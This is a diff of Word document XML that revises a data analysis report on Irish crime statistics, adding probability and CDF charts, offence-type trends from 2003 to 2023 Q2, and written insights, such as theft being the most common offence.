+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pmi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of Type of Offence</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>To get the exact PMI values, we can also explore the PMI itself by printing the values.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>The highest probability:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD57A97" wp14:editId="6760C087">
+            <wp:extent cx="4882243" cy="822150"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="24993055" name="Picture 1" descr="A computer screen shot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="24993055" name="Picture 1" descr="A computer screen shot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4928345" cy="829913"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:t>lowest probability:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EAA5AD3" wp14:editId="33430030">
+            <wp:extent cx="4904014" cy="874663"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="1733198198" name="Picture 1" descr="A close-up of a computer screen&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1733198198" name="Picture 1" descr="A close-up of a computer screen&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4935820" cy="880336"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Insights</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Based on the PMF chart we can make the following analyses:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>The most common type of offence is theft and related offences</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>30%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This is followed by robbery, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t xml:space="preserve">extortion </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>and hijacking offences.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>The least common types of offences are kidnapping and related offences.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>The distribution of offences is skewed, with a few types of offences being much more common than others.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Exploring CDF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>A CDF is a function that gives the probability that a random variable will take on a value less than or equal to a given value.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FDD55C" wp14:editId="5362C211">
+            <wp:extent cx="5257800" cy="3567208"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="173802360" name="Picture 1" descr="A graph with numbers and lines&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="173802360" name="Picture 1" descr="A graph with numbers and lines&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5263509" cy="3571081"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 07 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>CDF of crime_df</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights from the CDF:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>The CDF chart shows that the VALUE column is skewed to the right. This means that there is a relatively small number of crimes with very high values, and a large number of crimes with lower values.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>Most crimes have relatively low values.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>There is a small number of crimes with very high values.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Evolution</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of top 5 type of offence </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>from 2003 to 2023Q2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35AA9140" wp14:editId="216CD647">
+            <wp:extent cx="4948989" cy="2454982"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
+            <wp:docPr id="1294589389" name="Picture 1" descr="A graph of different colored lines&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1294589389" name="Picture 1" descr="A graph of different colored lines&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19">
+                    <a:blip r:embed="rId24">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -10103,7 +10342,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5584097" cy="2527133"/>
+                      <a:ext cx="4958123" cy="2459513"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -10119,116 +10358,301 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Figure 06 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Figure 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>pmi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
+        </w:rPr>
+        <w:t>Evolution of top 5 type of Offence 2003 to 2023 Q2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> of Type of Offence</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insight</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t>To get the exact PMI values, we can also explore the PMI itself by printing the values.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>The highest probability:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The most common crime offences in Ireland are theft and related offences, public order and other social code offences, and disorderly conduct. These three offences have consistently been in the top 5 since 2002.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The number of theft and related offences has declined significantly over time, from over 70,000 in 2002 to just over 40,000 in 2022. This is a decrease of over 40%.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We have to consider that the information in the chart is only up to July 2023. This means that it is possible that the crime rates for the year as a whole will be different from the rates shown in the chart.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>However, the chart does provide a valuable snapshot of the crime situation in Ireland in the first half of 2023. It shows that the overall crime rate has continued to decline, but that there are still some areas where crime remains a problem.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Population Growth vs Crime Rate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
